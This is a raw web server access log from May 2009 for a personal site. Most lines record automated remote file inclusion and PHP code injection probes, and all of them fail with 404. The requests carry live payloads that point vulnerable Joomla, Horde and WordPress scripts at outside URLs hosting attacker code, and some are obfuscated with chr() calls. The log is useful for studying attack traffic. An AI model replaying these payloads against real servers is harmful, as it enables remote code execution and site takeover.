65.98.59.178 - - [19/May/2009:09:07:19 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/roni121/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.98.59.178 - - [19/May/2009:09:07:19 -0700] "GET /logs/access_080524.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/roni121/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.98.59.178 - - [19/May/2009:09:07:20 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/roni121/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.98.59.178 - - [19/May/2009:09:07:24 -0700] "GET /logs/access_090209.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/roni121/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.246.20.221 - - [19/May/2009:09:07:24 -0700] "GET /logs/access_080604.log%20%20/index2.php?DoAction=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.141.54.240 - - [19/May/2009:09:07:25 -0700] "GET /logs/access_080529.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.90.108.169 - - [19/May/2009:09:07:34 -0700] "GET /logs/access_081018.log//horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.90.108.169 - - [19/May/2009:09:07:34 -0700] "GET /horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.90.108.169 - - [19/May/2009:09:07:34 -0700] "GET /logs//horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.246.20.221 - - [19/May/2009:09:07:38 -0700] "GET /logs/access_080905.log%20%20/index2.php?DoAction=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.18.76.16 - - [19/May/2009:09:08:07 -0700] "GET /logs/access_090103.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.246.20.221 - - [19/May/2009:09:08:10 -0700] "GET /logs/print.php?page=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.246.20.221 - - [19/May/2009:09:08:16 -0700] "GET /logs/access_080804.log%20%20/print.php?page=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:09:08:20 -0700] "GET /dfd_cart/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:09:08:20 -0700] "GET /logs//dfd_cart/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:09:08:20 -0700] "GET /logs/access_080318.log//dfd_cart/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:09:08:20 -0700] "GET /logs/access_080427.log//dfd_cart/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.248.128.84 - - [19/May/2009:09:08:23 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.115.141.244 - - [19/May/2009:09:08:32 -0700] "GET /bikes/002.JPG HTTP/1.1" 200 3680114 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3" "dmulk.com"
69.237.82.158 - - [19/May/2009:09:08:34 -0700] "GET /errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [19/May/2009:09:08:34 -0700] "GET /logs/access_090214.log%20%20//errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [19/May/2009:09:08:34 -0700] "GET /logs//errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.115.141.244 - - [19/May/2009:09:08:42 -0700] "GET /bikes/003.JPG HTTP/1.1" 200 4707551 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3" "dmulk.com"
208.115.141.244 - - [19/May/2009:09:08:44 -0700] "GET /bikes/004.JPG HTTP/1.1" 200 4512352 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3" "dmulk.com"
217.18.76.16 - - [19/May/2009:09:08:51 -0700] "GET /logs/access_080529.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.18.76.16 - - [19/May/2009:09:08:52 -0700] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.18.76.16 - - [19/May/2009:09:08:52 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.153.212.195 - - [19/May/2009:09:09:01 -0700] "GET /logs/access_080831.log%20%20//components/com_flyspray/startdown.php?file=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.212.195 - - [19/May/2009:09:09:01 -0700] "GET /logs/access_080906.log%20%20//components/com_flyspray/startdown.php?file=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:09:09:06 -0700] "GET /logs/access_080826.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.59.178 - - [19/May/2009:09:09:07 -0700] "GET /logs/access_080524.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/dinayu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.98.59.178 - - [19/May/2009:09:09:07 -0700] "GET /logs/access_090209.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/dinayu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [19/May/2009:09:09:09 -0700] "GET /logs/access_081117.log%20%20//errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.98.59.178 - - [19/May/2009:09:09:10 -0700] "GET /logs/access_080524.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/roni121/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.98.59.178 - - [19/May/2009:09:09:10 -0700] "GET /logs/access_090209.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/roni121/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.98.59.178 - - [19/May/2009:09:09:18 -0700] "GET /logs/access_080524.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/roni121/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.98.59.178 - - [19/May/2009:09:09:18 -0700] "GET /logs/access_090209.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/roni121/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.217.216.86 - - [19/May/2009:09:09:21 -0700] "GET /logs/access_090129.log//songinfo.php?commonpath=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.217.216.86 - - [19/May/2009:09:09:21 -0700] "GET /logs/access_090223.log//songinfo.php?commonpath=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:09:09:56 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:09:09:56 -0700] "GET /logs/access_080831.log//components/com_flyspray/startdown.php?file=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:09:09:56 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:09:09:56 -0700] "GET /logs/access_080906.log//components/com_flyspray/startdown.php?file=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.246.20.221 - - [19/May/2009:09:09:58 -0700] "GET /logs//cards_eng.php//?_SERVER[DOCUMENT_ROOT]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.246.20.221 - - [19/May/2009:09:09:58 -0700] "GET /logs/access_080804.log//cards_eng.php//?_SERVER[DOCUMENT_ROOT]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:09:09:59 -0700] "GET /logs/access_080318.log%20%20//dfd_cart/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:09:10:04 -0700] "GET /logs/access_080427.log%20%20//dfd_cart/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.118.156.242 - - [19/May/2009:09:10:12 -0700] "GET /logs//songinfo.php?commonpath=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.118.156.242 - - [19/May/2009:09:10:12 -0700] "GET /songinfo.php?commonpath=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.118.156.242 - - [19/May/2009:09:10:12 -0700] "GET /logs/access_080609.log//songinfo.php?commonpath=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.118.156.242 - - [19/May/2009:09:10:16 -0700] "GET /logs/access_090502.log//songinfo.php?commonpath=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.135.14 - - [19/May/2009:09:10:17 -0700] "GET /logs/access_080826.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.237.82.158 - - [19/May/2009:09:10:43 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [19/May/2009:09:10:43 -0700] "GET /logs/access_080831.log//components/com_flyspray/startdown.php?file=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [19/May/2009:09:10:43 -0700] "GET /logs/access_080906.log//components/com_flyspray/startdown.php?file=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [19/May/2009:09:10:43 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:09:11:22 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:09:11:22 -0700] "GET /logs/access_080906.log//components/com_flyspray/startdown.php?file=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:09:11:22 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:09:11:22 -0700] "GET /logs/access_080831.log//components/com_flyspray/startdown.php?file=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.248.128.84 - - [19/May/2009:09:11:26 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:09:11:27 -0700] "GET /logs/access_080831.log%20%20//components/com_flyspray/startdown.php?file=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:09:11:27 -0700] "GET /logs/access_080906.log%20%20//components/com_flyspray/startdown.php?file=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.10 - - [19/May/2009:09:11:29 -0700] "GET /logs/access_081020.log//errors.php?error=http://www.russianwomenabroad.com//poll/templates/simple/idste.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
91.195.124.10 - - [19/May/2009:09:11:29 -0700] "GET /errors.php?error=http://www.russianwomenabroad.com//poll/templates/simple/idste.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
71.228.103.18 - - [19/May/2009:09:11:30 -0700] "GET /bikes/002.JPG HTTP/1.1" 200 3680114 "http://www.st-owners.com/forums/showthread.php?t=64573" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" "dmulk.com"
71.228.103.18 - - [19/May/2009:09:11:33 -0700] "GET /bikes/004.JPG HTTP/1.1" 200 4512352 "http://www.st-owners.com/forums/showthread.php?t=64573" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" "dmulk.com"
71.228.103.18 - - [19/May/2009:09:11:37 -0700] "GET /bikes/003.JPG HTTP/1.1" 200 4707551 "http://www.st-owners.com/forums/showthread.php?t=64573" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" "dmulk.com"
66.118.156.242 - - [19/May/2009:09:11:49 -0700] "GET /logs/access_080609.log%20%20//songinfo.php?commonpath=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.118.156.242 - - [19/May/2009:09:11:49 -0700] "GET /logs/access_090502.log%20%20//songinfo.php?commonpath=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [19/May/2009:09:11:50 -0700] "GET //vwar/backup/errors.php?error=http://www.mambi.it//components/com_poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.171.225.234 - - [19/May/2009:09:11:50 -0700] "GET //vwar/backup/errors.php?error=http://www.confiteriacentral.cl/carta/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.246.20.221 - - [19/May/2009:09:11:52 -0700] "GET /logs/access_080602.log%20%20/print.php?page=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.184.2.107 - - [19/May/2009:09:11:52 -0700] "GET /logs/access_081018.log//horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.184.2.107 - - [19/May/2009:09:11:52 -0700] "GET /horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.184.2.107 - - [19/May/2009:09:11:53 -0700] "GET /logs//horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.184.2.107 - - [19/May/2009:09:11:58 -0700] "GET /logs/access_081018.log//horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.184.2.107 - - [19/May/2009:09:11:58 -0700] "GET /horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.184.2.107 - - [19/May/2009:09:11:58 -0700] "GET /logs//horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.246.98.78 - - [19/May/2009:09:11:59 -0700] "GET /logs//install/install3.php?database=none&cabsolute_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.246.98.78 - - [19/May/2009:09:11:59 -0700] "GET /logs/access_080319.log//install/install3.php?database=none&cabsolute_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.246.98.78 - - [19/May/2009:09:11:59 -0700] "GET /install/install3.php?database=none&cabsolute_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.184.2.107 - - [19/May/2009:09:12:07 -0700] "GET /logs/access_081018.log//horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.184.2.107 - - [19/May/2009:09:12:07 -0700] "GET /horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.184.2.107 - - [19/May/2009:09:12:07 -0700] "GET /logs//horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.90.108.169 - - [19/May/2009:09:12:09 -0700] "GET /logs/access_081018.log//horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.90.108.169 - - [19/May/2009:09:12:09 -0700] "GET /horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.90.108.169 - - [19/May/2009:09:12:09 -0700] "GET /logs//horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.118.156.242 - - [19/May/2009:09:12:10 -0700] "GET /logs/access_090328.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.191.102.117 - - [19/May/2009:09:12:12 -0700] "GET /logs/access_090502.log%20%20/index1.php?dat=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.191.102.117 - - [19/May/2009:09:12:12 -0700] "GET /logs/index1.php?dat=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.191.102.117 - - [19/May/2009:09:12:12 -0700] "GET /logs/access_090203.log%20%20/index1.php?dat=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.118.156.242 - - [19/May/2009:09:12:13 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.118.156.242 - - [19/May/2009:09:12:13 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.10 - - [19/May/2009:09:12:14 -0700] "GET /logs/access_081020.log//errors.php?error=http://www.russianwomenabroad.com//poll/templates/simple/idste.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.10 - - [19/May/2009:09:12:14 -0700] "GET /errors.php?error=http://www.russianwomenabroad.com//poll/templates/simple/idste.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.10 - - [19/May/2009:09:12:15 -0700] "GET /logs//errors.php?error=http://www.russianwomenabroad.com//poll/templates/simple/idste.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.118.156.242 - - [19/May/2009:09:12:21 -0700] "GET /logs/access_080315.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.184.2.107 - - [19/May/2009:09:12:24 -0700] "GET /logs/access_081125.log//horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.29.137 - - [19/May/2009:09:12:26 -0700] "GET /logs/access_081018.log//horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.29.137 - - [19/May/2009:09:12:27 -0700] "GET /horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.184.2.107 - - [19/May/2009:09:12:27 -0700] "GET /logs/access_081125.log//horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.29.137 - - [19/May/2009:09:12:27 -0700] "GET /logs//horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [19/May/2009:09:12:28 -0700] "GET /logs/access_090209.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [19/May/2009:09:12:28 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [19/May/2009:09:12:28 -0700] "GET /logs/access_080524.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [19/May/2009:09:12:28 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.184.2.107 - - [19/May/2009:09:12:29 -0700] "GET /logs/access_081125.log//horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
